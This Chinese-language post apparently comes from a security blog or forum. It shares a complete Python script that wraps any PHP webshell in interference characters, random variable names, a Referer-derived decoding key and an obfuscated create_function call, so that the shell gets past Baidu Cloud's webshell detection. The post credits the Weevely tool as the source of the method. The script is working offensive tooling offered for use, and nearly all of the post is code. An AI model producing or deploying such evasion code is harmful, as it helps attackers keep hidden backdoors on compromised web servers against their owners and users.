分享一个PHP免杀脚本 可以过百度云Webshell检测

过不了阿里云 原理是来自于Weevely工具

#!/usr/bin/python3
import random
import string

 
#这里输自定义干扰字符
add_interfere_str='CnM' 
Referer = 'https://developer.mozilla.'+ add_interfere_str +'.org/testpage.html'
notice = '//连接Referer:' + Referer 

#发送webshell时记得传Referer的值,比如:Referer: [url]https://developer.mozilla.sTr.org/testpage.html[/url],其中sTr就是干扰字符,之后过滤要用到
 
def read_check():
    open_file = open('shell.php', 'r',encoding='utf-8')  #将shell.php替换为要转换的webshell文件名
    read_file = open_file.readlines()
    file = ''.join(read_file)  
    file = file.replace("'", '"').replace('\n', '').replace('\t', '')
    if file.startswith('<?php'):  
        file = file.lstrip('<?php')
        file = file.rstrip('?>')
    else:
        print('这不是php代码')
    return file
 
def interfere(file):
    add_str = ''
    rest_str = ''
    num = 0
    for i in file:
        num += 1
        if num == 3:   # 间隔3个字符输入干扰,可自行替换
            add_results = add_interfere_str.join(rest_str)
            add_str += add_results
            rest_str = ''
            num = 0
        rest_str += i
    add_str += rest_str
 
 
    temp_str = ''
    array_str = []
    for i in add_str:
        num += 1
        if num == 80: # 每隔80个字符分割字符串,可自行替换
            array_str.append(temp_str)
            temp_str = ''
            num = 0
        temp_str += i
    array_str.append(temp_str)
    return array_str
 
def var_name(array_str):
    var_collect = []
    array_add = []
    for c in array_str:
        random_str = ''.join(random.sample(string.ascii_letters, 3))
        add_sentence = '$' + random_str + '=' + "'" + c + "'" + ";"
        array_add.append(add_sentence)
        var_collect.append(random_str)
    return array_add,var_collect
 
def splicing(var_collect):
    splicing_sentence = ''
    for i in var_collect:
        var_sentence = '.' + '$' + i
        splicing_sentence += var_sentence
    final = splicing_sentence.lstrip('.')
    return final
 
def str_print(array_add,final):
    fileName='bypass.php'
    a ='<?php'
    b = "$b =$_SERVER['HTTP_REFERER'];"
    c = "$c = explode('.',$b);"
    Tips = notice
    interfere_str = "$interfere_str =$c[2]; "
    aosp = a+'\n'+Tips+'\n'+b+'\n'+c+'\n'+interfere_str
    with open(fileName,'a',encoding='utf-8')as file:
        file.write(aosp)
        file.close()

    for i in array_add:
        with open(fileName,'a',encoding='utf-8')as file:
            file.write('\n'+i)
            
    file.close()
 
    #变量名为自定义,都可替换
    l = "$l" + "=" + "str_replace($interfere_str,'',%s);" % (final)
    k = "$k=str_replace($interfere_str,'','cre%sat%se_fu%snc%stio%sn');" % (add_interfere_str,add_interfere_str,add_interfere_str,add_interfere_str,add_interfere_str)
    bb = "$bb = $GLOBALS['k']('',$l); "
    ee = '$GLOBALS["bb"]();'
    abvd = l+'\n'+k+'\n'+bb+'\n'+ee+'\n'+'?>'
    
    with open(fileName,'a',encoding='utf-8')as file:
        file.write(abvd)
        file.close()
 
def main():
    file = read_check()
    array_str = interfere(file)
    array_add,var_collect = var_name(array_str)
    final = splicing(var_collect)
    str_print(array_add,final)
    
if __name__ == '__main__':
    main()


评论区

评论一下~


6+28=?

暂无评论,要不来一发?

回到顶部